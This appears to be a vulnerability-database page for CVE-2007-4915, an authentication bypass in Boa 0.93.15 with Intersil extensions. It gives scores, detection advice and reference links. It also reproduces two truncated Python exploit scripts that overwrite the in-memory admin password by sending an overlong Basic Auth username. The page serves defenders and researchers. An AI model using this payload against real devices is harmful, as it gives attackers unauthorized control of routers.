CVE-2007-4915
published 2007-09-17CVE-2007-4915: The Intersil isl3893 extensions for Boa 0.93.15, as used on the FreeLan RO80211G-AP and other devices, do not prevent stack writes from entering memory…
PriorityP267critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
67.65%
99.2th percentile
The Intersil isl3893 extensions for Boa 0.93.15, as used on the FreeLan RO80211G-AP and other devices, do not prevent stack writes from entering memory locations used for string constants, which allows remote attackers to change the admin password stored in memory via a long username in an HTTP Basic Authentication request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| boa | boa_webserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandUSERNAME = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'↗
- →Detect HTTP Basic Authentication requests where the username field exceeds 127 bytes in length, targeting Boa 0.93.x–0.94.11 servers with Intersil extensions. ↗
- →Monitor for HTTP Basic Auth requests where the Authorization header username is a long repeated-character string (e.g., 127+ 'a' characters), indicative of a memory overwrite attempt. ↗
- →The exploit targets the realm string 'LOGIN(default username & password is admin)' — alert on Basic Auth attempts using this exact realm string as it is specific to vulnerable Intersil-extended Boa devices. ↗
- →The attack may also produce a denial-of-service condition on the target device; correlate authentication failures or device unresponsiveness with oversized Basic Auth username fields. ↗
- →Ensure the monitored URI is the directory requiring Basic Authentication; the exploit specifically targets protected paths such as /home/index.shtml. ↗
- ·This vulnerability only affects Boa builds that include the Intersil isl3893 extensions; stock Boa installations are not vulnerable. ↗
- ·The exploit overwrites the admin password in memory (not on disk); a device reboot may restore the original password, but the attacker gains temporary unauthorized access. ↗
- ·The default target IP used in public exploit code is 192.168.0.1 (typical LAN gateway address for affected devices such as the FreeLan RO80211G-AP); detections should not be limited to this address. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Boa 0.93.15 - HTTP Basic Authentication Bypass
exploitdb·2007-10-16
CVE-2007-4915 Boa 0.93.15 - HTTP Basic Authentication Bypass
Boa 0.93.15 - HTTP Basic Authentication Bypass
---
/*
* Boa HTTP Basic Authentication Bypass
* Vuln: Boa/0.93.15 (with Intersil Extensions)
*
* Original Advisory:
* http://www.securityfocus.com/archive/1/479434
* http://www.ikkisoft.com/stuff/SN-2007-02.txt
*
* Luca "ikki" Carettoni
* http://www.ikkisoft.com
*/
----
#!/usr/bin/env python
import urllib2
SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME
= 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res
Exploit-DB
Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass
exploitdb·2007-09-14
CVE-2007-4915 Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass
Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass
---
source: https://www.securityfocus.com/bid/25676/info
Boa is prone to an authentication-bypass vulnerability because the application fails to ensure that passwords are not overwritten by specially crafted HTTP Requests.
An attacker can exploit this issue to gain unauthorized access to the affected application. This may lead to other attacks.
This issue affects Boa 0.93.15; other versions may also be affected.
NOTE: This issue affects only Boa with Intersil Extensions installed.
#!/usr/bin/env python
import urllib2
SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME =
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'
a
Metasploit
Intersil (Boa) HTTPd Basic Authentication Password Reset
metasploit
Intersil (Boa) HTTPd Basic Authentication Password Reset
Intersil (Boa) HTTPd Basic Authentication Password Reset
The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11 allows basic authentication bypass when the user string is greater than 127 bytes long. The long string causes the password to be overwritten in memory, which enables the attacker to reset the password. In addition, the malicious attempt also may cause a denial-of-service condition. Please note that you must set the request URI to the directory that requires basic authentication in order to work properly.
No writeups or analysis indexed.
http://securityreason.com/securityalert/3151http://www.gnucitizen.org/projects/router-hacking-challenge/http://www.ikkisoft.com/stuff/SN-2007-02.txthttp://www.securenetwork.it/ricerca/advisory/download/SN-2007-02.txthttp://www.securityfocus.com/archive/1/479434/100/0/threadedhttp://www.securityfocus.com/archive/1/489009/100/0/threadedhttp://www.securityfocus.com/bid/25676https://www.exploit-db.com/exploits/4542http://securityreason.com/securityalert/3151http://www.gnucitizen.org/projects/router-hacking-challenge/http://www.ikkisoft.com/stuff/SN-2007-02.txthttp://www.securenetwork.it/ricerca/advisory/download/SN-2007-02.txthttp://www.securityfocus.com/archive/1/479434/100/0/threadedhttp://www.securityfocus.com/archive/1/489009/100/0/threadedhttp://www.securityfocus.com/bid/25676https://www.exploit-db.com/exploits/4542
2007-09-17
Published